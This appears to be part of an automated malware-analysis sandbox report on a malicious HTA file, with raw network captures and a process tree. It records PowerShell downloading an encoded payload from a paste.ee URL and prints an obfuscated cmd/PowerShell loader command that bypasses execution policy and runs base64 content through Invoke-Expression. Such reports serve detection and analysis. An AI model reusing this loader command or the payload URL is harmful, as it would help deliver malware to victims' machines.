2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
2024-12-17 06:22:11 UTC | 1378 | IN | Data Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                          Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49770 | 104.21.84.67 | 443 | 5924 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 06:22:33 UTC | 67 | OUT | GET /r/3tNKn/0 HTTP/1.1
    Host: paste.ee
    Connection: Keep-Alive
2024-12-17 06:22:34 UTC | 1271 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 06:22:34 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    CF-Cache-Status: MISS
    Last-Modified: Tue, 17 Dec 2024 06:22:34 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrIfldVJE5NMLXRM5MsBimYj17qYNFzGYm9aNMUL1luTv0i8yHaU72aQbG0%2BwCINM88s7LHT5voZ44Oa1fSc6d5Wf4vGNippFHtZF7B3OeOGCWy8xFTuHHpGyw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f34d1c4fb720f43-EWR
    alt-svc: h3=":443"; ma=86400
2024-12-17 06:22:34 UTC | 214 | IN | Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 37 31 26 6d 69 6e 5f 72 74 74 3d 31 34 36 36 26 72 74 74 5f 76 61 72 3d 35 36 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 33 37 36 32 34 26 63 77 6e 64 3d 33 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 61 34 61 63 34 65 39 63 39 39 37 36 63 35 33 26 74 73 3d 39 33 33 26 78 3d 30 22 0d 0a 0d 0a
    Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1466&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1937624&cwnd=32&unsent_bytes=0&cid=5a4ac4e9c9976c53&ts=933&x=0"
2024-12-17 06:22:34 UTC | 1253 | IN | Data Raw: 33 35 66 37 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
    Data Ascii: 35f7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f 38 68 44 41 33 77 2f 4e 34 66
    Data Ascii: 93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO8hDA3w/N4f
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d 66 44 62 33 51 32 4e 63 64 44
    Data Ascii: 6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDb3Q2NcdD
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30
    Data Ascii: gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44 69 33 51 34 4e 41 65 44 66 33
    Data Ascii: kOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeDi3Q4NAeDf3
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41 41 51 48 41 45 41 50 41 41 41
    Data Ascii: PA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAAAQHAEAPAAA
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35 51 64 4f 47 6e 44 70 35 38 5a
    Data Ascii: eKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45QdOGnDp58Z
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44 67 50 7a 34 44 46 39 63 66 50
    Data Ascii: KTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP
2024-12-17 06:22:34 UTC | 1369 | IN | Data Raw: 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44 71 2b 49 71 50 63
    Data Ascii: jowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6Dq+IqPc



Target ID: 0
Start time: 01:21:57
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta"
Imagebase: 0x630000
File size: 13'312 bytes
MD5 hash: 06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 1
Start time: 01:21:58
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 01:21:58
Start date: 17/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 01:21:58
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
